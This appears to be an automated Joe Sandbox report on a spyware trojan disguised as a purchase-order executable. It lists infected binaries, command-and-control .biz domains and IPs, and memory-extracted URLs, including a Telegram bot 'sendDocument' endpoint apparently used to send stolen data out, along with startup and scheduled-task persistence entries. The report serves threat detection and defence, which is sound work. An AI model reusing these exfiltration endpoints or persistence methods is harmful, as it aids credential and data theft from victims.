C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://54.244.188.177/ygrk	0%	Avira URL Cloud	safe
http://54.244.188.177/7&3	0%	Avira URL Cloud	safe
http://54.244.188.177:80/fowvjqhq	0%	Avira URL Cloud	safe
http://18.141.10.107/F	0%	Avira URL Cloud	safe
http://18.141.10.107/M	0%	Avira URL Cloud	safe
http://18.141.10.107/	0%	Avira URL Cloud	safe
http://18.141.10.107/uqppkasccjtxkC	0%	Avira URL Cloud	safe
http://18.141.10.107/pmxflidirkcbpvmtV	0%	Avira URL Cloud	safe
http://54.244.188.177/tp	0%	Avira URL Cloud	safe
http://54.244.188.177/z	0%	Avira URL Cloud	safe
http://54.244.188.177/?uA	0%	Avira URL Cloud	safe
http://18.141.10.107/uqppkasccjtxk	0%	Avira URL Cloud	safe
http://54.244.188.177/ucqpyylY	0%	Avira URL Cloud	safe
http://54.244.188.177/tp$V	0%	Avira URL Cloud	safe
http://18.141.10.107/pmxflidirkcbpvm.Sy	0%	Avira URL Cloud	safe
http://54.244.188.177/V	100%	Avira URL Cloud	phishing
http://54.244.188.177/%&	0%	Avira URL Cloud	safe
http://54.244.188.177/ucqpyyl	0%	Avira URL Cloud	safe
http://54.244.188.177:80/ucqpyyl	0%	Avira URL Cloud	safe
http://54.244.188.177/f	100%	Avira URL Cloud	phishing
http://54.244.188.177/ygrkx	0%	Avira URL Cloud	safe
http://54.244.188.177/tpz	0%	Avira URL Cloud	safe
http://18.141.10.107/pmxflidirkcbpvm	0%	Avira URL Cloud	safe
http://54.244.188.177/fowvjqhq	0%	Avira URL Cloud	safe
http://54.244.188.177:80/tpU	0%	Avira URL Cloud	safe
http://54.244.188.177:80/ygrk	0%	Avira URL Cloud	safe
http://18.141.10.107/d3	0%	Avira URL Cloud	safe
http://18.141.10.107:80/uqppkasccjtxk	0%	Avira URL Cloud	safe
http://18.141.10.107:80/pmxflidirkcbpvm	0%	Avira URL Cloud	safe
http://54.244.188.177/&uX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
przvgke.biz	172.234.222.143	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
ifsaia.biz	13.251.16.150	true	false	high
deoci.biz	18.208.156.248	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
tbjrpv.biz	34.246.200.160	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
saytjshyf.biz	44.221.84.105	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
fwiwk.biz	172.234.222.143	true	false	high
vcddkls.biz	18.141.10.107	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
zlenh.biz	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
anpmnmxo.biz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://ifsaia.biz/jlhpxxcq	false	high
http://pywolwnvd.biz/ygrk	false	high
http://saytjshyf.biz/xyvnmtdiyfgocm	false	high
http://lpuegx.biz/svftqsgvqnih	false	high
http://ssbzmoy.biz/uqppkasccjtxk	false	high
http://tbjrpv.biz/ho	false	high
http://checkip.dyndns.org/	false	high
http://fwiwk.biz/mhwavs	false	high
http://vjaxhpbji.biz/dpxeblwuppuirbnx	false	high
http://knjghuig.biz/ywaoqfakpesqv	false	high
http://lpuegx.biz/ecjuuqdshncew	false	high
http://ssbzmoy.biz/pmxflidirkcbpvm	false	high
http://fwiwk.biz/dydgtoryupjgtl	false	high
http://cvgrf.biz/ncgaeohbois	false	high
http://przvgke.biz/hvtqtjugbboqpm	false	high
http://pywolwnvd.biz/tp	false	high
http://npukfztj.biz/xmmfsweyvhue	false	high
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://xlfhhhm.biz/wjxiioeyplqiis	false	high
http://vcddkls.biz/lyroetjkhx	false	high
http://pywolwnvd.biz/fowvjqhq	false	high
http://przvgke.biz/tohnhxnrpjse	false	high
http://pywolwnvd.biz/ksmybghbmbq	false	high
http://vjaxhpbji.biz/fgjkxxt	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://54.244.188.177:80/fowvjqhq	Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/F	alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000010.00000002.2246819288.0000000007583000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2262728885.0000000008452000.00000004.00000020.00020000.00000000.sdmp	false		high
https://crashpad.chromium.org/bug/new	setup.exe1.3.dr	false		high
http://reallyfreegeoip.orgd	server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmp	false		high
http://18.141.10.107/M	Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/7&3	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107/pmxflidirkcbpvmtV	alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	setup.exe1.3.dr	false		high
http://18.141.10.107/	Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/uqppkasccjtxkC	Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/ygrk	Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/tp	alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/z	alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/?uA	Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://contoso.com/	powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107/uqppkasccjtxk	Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBjq	powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/8	alg.exe, 00000003.00000003.3026882137.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011446827.0000000001440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	server01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/ucqpyylY	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/site/autoit/8	alg.exe, 00000003.00000003.3070682412.0000000001440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://54.244.188.177/	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099138098.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/tp$V	alg.exe, 00000003.00000003.2092069897.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/%&	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/V	alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177:80/ucqpyyl	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/	setup.exe1.3.dr	false		high
http://54.244.188.177/ucqpyyl	PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crash-reports.mozilla.com/submit?id=	alg.exe, 00000003.00000003.2874497887.0000000001450000.00000004.00001000.00020000.00000000.sdmp	false		high
http://18.141.10.107/pmxflidirkcbpvm.Sy	alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=usage_stats_crash_reports	setup.exe1.3.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pywolwnvd.biz/	Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1	alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/f	alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://54.244.188.177/ygrkx	Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/fowvjqhq	Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000317C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..	setup.exe1.3.dr	false		high
http://54.244.188.177/tpz	alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/	alg.exe, 00000003.00000003.3026352524.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011197647.0000000001440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://18.141.10.107/pmxflidirkcbpvm	alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107/d3	Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.75l	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177:80/tpU	alg.exe, 00000003.00000003.2093209407.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177:80/ygrk	Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.comd	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107:80/uqppkasccjtxk	Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.75d	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/&uX	Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107:80/pmxflidirkcbpvm	alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.orgd	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.microsoft.c	RegSvcs.exe, 00000018.00000002.2277102302.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.winimage.com/zLibDll	alg.exe, 00000003.00000003.2360118722.0000000001570000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
44.221.84.105	saytjshyf.biz	United States	14618	AMAZON-AESUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
172.234.222.143	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
13.251.16.150	ifsaia.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561085
Start date and time:	2024-11-22 18:54:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO #09465610_GQ 003745_SO-242000846.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@32/146@26/10
EGA Information:	Successful, ratio: 81.8%
HCA Information:	Successful, ratio: 78% Number of executed functions: 63 Number of non-executed functions: 284
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Trading_AIBot.exe, PID 1276 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1784 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: PO #09465610_GQ 003745_SO-242000846.exe

Simulations

Behavior and APIs

Time	Type	Description
12:55:02	API Interceptor	15x Sleep call for process: alg.exe modified
12:55:09	API Interceptor	19x Sleep call for process: powershell.exe modified
12:55:16	API Interceptor	1x Sleep call for process: Grinnellia.exe modified
12:55:48	API Interceptor	1335x Sleep call for process: apihost.exe modified
18:55:02	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs
18:55:09	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
18:55:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
44.221.84.105	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	jhvzpcfg.biz/qehuuaxgtrfd
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	hehckyov.biz/of
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	hehckyov.biz/sdgvcmfo
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	gahyhiz.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	vocyzit.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	vocyzit.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	gadyciz.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	vocyzit.com/login.php
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	gahyhiz.com/login.php
	WlCVLbzNph.exe	Get hash	malicious	Simda Stealer	Browse	gadyciz.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ssbzmoy.biz	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	18.141.10.107
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	SetupRST.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107
przvgke.biz	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.143
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.143
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.138
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	172.234.222.143
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	172.234.222.138
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	172.234.222.138
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	172.234.222.138
	SetupRST.exe	Get hash	malicious	Unknown	Browse	172.234.222.138
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	172.234.222.143
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	172.234.222.143
knjghuig.biz	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	18.141.10.107
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	SetupRST.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	18.141.10.107
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.cinehub.click/anus	Get hash	malicious	Unknown	Browse	104.21.30.239
	https://novelalert.cloudaccess.host/wp-admin/includes/contactamende/	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
